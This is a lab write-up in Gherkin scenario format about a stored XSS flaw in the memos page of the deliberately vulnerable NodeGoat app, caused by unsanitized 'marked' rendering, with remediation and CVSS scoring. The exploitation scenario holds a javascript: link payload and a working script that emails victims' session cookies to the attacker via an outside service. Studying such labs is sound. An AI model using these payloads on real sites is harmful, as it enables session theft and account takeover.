## Version 1.4.1
## language: en

Feature:
  TOE:
    node-goat
  Category:
    Insecure component
  Location:
    http://localhost:3000/memos
  CWE:
    CWE-1026: Weaknesses in OWASP Top Ten (2017)
    https://cwe.mitre.org/data/definitions/1026.html
    CWE-1004: Sensitive Cookie Without HttpOnly Flag
    https://cwe.mitre.org/data/definitions/1004.html
  Rule:
    REQ.262: Verify third-party components
    https://fluidattacks.com/web/rules/262/
    REQ.029: Cookies with security attributes
    https://fluidattacks.com/web/rules/029/
  Goal:
    Get the session cookie
  Recommendation:
    Sanitize all insecure components.

  Background:
  Hacker's software:
    | <Software name> |    <Version>    |
    | Windows         |       10        |
    | Chrome          |  80.0.3987.122  |
  TOE information:
    Given I am accessing the site http://localhost:4000
    And the server is running MongoDB version 2.1.18
    And Nodejs version 10.15.3

  Scenario: Normal use case
    Given I access to "http://localhost:3000/"
    And login in with a new user
    When I was redirected to the dashboard
    And I can manage my account

  Scenario: Static detection
    Given The source code
    When I see the code in "server.js"
    Then I try to search for an insecure component
    And I found some lines with an interesting component
    """
    var marked = require('marked')
    ..............................
    app.locals.marked = marked;
    """
    When I see that the server use marked and didn't sanitize it
    Then I know that an attacker can inject scripts in marked
    And I try to find where is used this component
    When I go to the route "/app/views/memos.html"
    Then I see that here is used marked
    """
    {% for doc in memosList %}
      <div class="panel panel-info">
        <div class="panel-body">
          {{ marked(doc.memo) }}
        </div>
      </div>
    {% endfor %}
    """
    And I see that the memo is stored in a DB
    When I know that the page gets the memo, the page use marked to convert it
    Then I see that the vulnerability can be exploitable with this tab
    And I found an insecure component/vulnerability

  Scenario: Dynamic detection
    Given I'm on the login form
    When  I log in to the page
    Then I was redirected to the dashboard
    And I click on the section "memos"
    When I see a field to write any memo for any user
    Then I try to send a normal memo with markdown
    And I see my memo [evidence](img1)
    When I try to inject scripts with markdown
    Then I make a script with an alert
    And I submit the script like a link
    """
    [Script](javascript:alert('Insecure component'))
    """
    When I click on the link nothing happen
    Then I read the script and see that the memo
    And I see that marked scape one ")"
    When I try again with the character "&#41;" that is ")"
    And I submit the script again
    When I see the link I click on it
    Then I receive an alert with my message [evidence](img2)
    And I found a vulnerability

  Scenario: Exploitation (cookie of any user)
    Given I can send scripts with marked
    Given All users can see the memos
    When I think a way to attack with marked
    Then I'm in the login page
    And I'm login with my evil user
    When I'm on the dashboard
    Then I click in the "memos" tab
    And I'm in the "memos" tab
    When I see that the memos can use markdown
    Then I try to inject any script
    And I see that is successful
    When I see that I can use scripts in the "memos" tab
    Then I think that I can get the cookies from any user
    And I try to make a script that gets the cookies
    When I was making the script I notice that I can use directly HTML
    Then I upload an image to distract the users
    And I make a script taking the cookie and send it to an email
    """
    <script type="text/javascript"
        src="https://cdn.jsdelivr.net/npm/emailjs-com@2.3.2/dist/email.min.js">
    </script>
    <script type="text/javascript">
      (function(){
        emailjs.init("user_2nFpwL4QDZ8x1xzY7GTXu");
      })();
    </script>
    <img src="<IMAGE URL"/>
    <script type="text/javascript">
      emailjs.send("gmail", "template_nOBiPn2b", {"from_name":"Hacker",
      "to_name":"Hacker","message_html":"<b>document.cookie: </b>"
      +document.cookie})
    </script>
    """
    When I see the result [evidence](img3)
    Then I reload the page
    And The user don't notice anything, but the cookie was sent
    When I see my email I can see a message with the cookie [evidence](img4)
    Then I can use it to login Without credentials
    And I exploit the vulnerability

  Scenario: Remediation
    Given The source code
    When I see the code in "server.js"
    Then I see that "Marked" is used
    And I add a sanitize option to "Marked"
    """
    marked.setOptions({
        sanitize: true
    });
    """
    When I try to make the attack again
    Then I see that the attack fail
    And I see that the old injections fail to [evidence](img5)
    When I see that I recognize 2 cases
    """
    Case 1: If the injection was doing with HTML the memo loads the code
            like a string
    Case 2: If the injection was doing with Markdown the memo loads a
            blank row
    """
    Then I see that the attack won't work anymore
    And I fix the vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
      6.8/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    Temporal: Attributes that measure the exploit's popularity and fixability
      6.5/10 (Medium) - E:H/RL:O/RC:C/CR:H/IR:L/AR:L
    Environmental: Unique and relevant attributes to a specific user environment
      7.4/10 (High) - MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:H/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2020-03-06
